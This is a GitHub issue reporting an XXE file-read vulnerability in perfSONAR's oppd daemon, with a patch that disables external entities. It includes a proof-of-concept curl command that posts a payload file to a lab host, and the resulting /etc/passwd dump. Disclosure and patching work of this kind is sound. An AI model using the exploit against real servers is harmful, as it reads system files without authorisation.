search

perfsonar / oppd

On-demand measurement point daemon
Apache License 2.0
0 stars 0 forks source link

[Security] Arbitrary File Read via XXE #9

Closed bored-engineer closed 8 years ago

bored-engineer commented 8 years ago

LibXML allows the loading of external entities by default allowing unauthenticated arbitrary file read from the system using XXE.

This patch disables external entity processing by creating a ext_ent_handler that returns an empty string.

bored-engineer commented 8 years ago

You can test this issue by downloading this file: oppd.xml Then running the following command will return /etc/passwd:

# curl -X POST http://172.16.240.138:8090/ -d @oppd.xml
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">  <SOAP-ENV:Header/>  <SOAP-ENV:Body><nmwg:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/" xmlns:nmwgr="http://ggf.org/ns/nmwg/result/2.0/" type="ErrorResponse">       <nmwg:data>             root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
nagios:x:499:499::/var/spool/nagios:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
rtkit:x:498:498:RealtimeKit:/proc:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
cassandra:x:497:497::/usr/share/cassandra:/bin/bash
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
owamp:x:496:496::/tmp:/bin/nologin
bwctl:x:495:495::/tmp:/bin/nologin
perfsonar:x:494:500:perfSONAR User:/tmp:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
saslauth:x:493:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
memcached:x:492:494:Memcached daemon:/var/run/memcached:/sbin/nologin
esmond:x:491:501:Esmond User:/tmp:/sbin/nologin
pulse:x:490:492:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
admin:x:500:504::/home/admin:/bin/bash
sudo:x:501:505::/home/sudo:/bin/bash
        </nmwg:data>        <nmwg:metadata id="return_message"><nmwg:eventType>error.nmwg.action_not_supported</nmwg:eventType></nmwg:metadata><nmwg:data metadataIdRef="return_message" id="data_return_message"><nmwgr:datum>Unknown messagetype: </nmwgr:datum></nmwg:data></nmwg:message></SOAP-ENV:Body></SOAP-ENV:Envelope>
laeti-tia commented 8 years ago

Thanks for this report!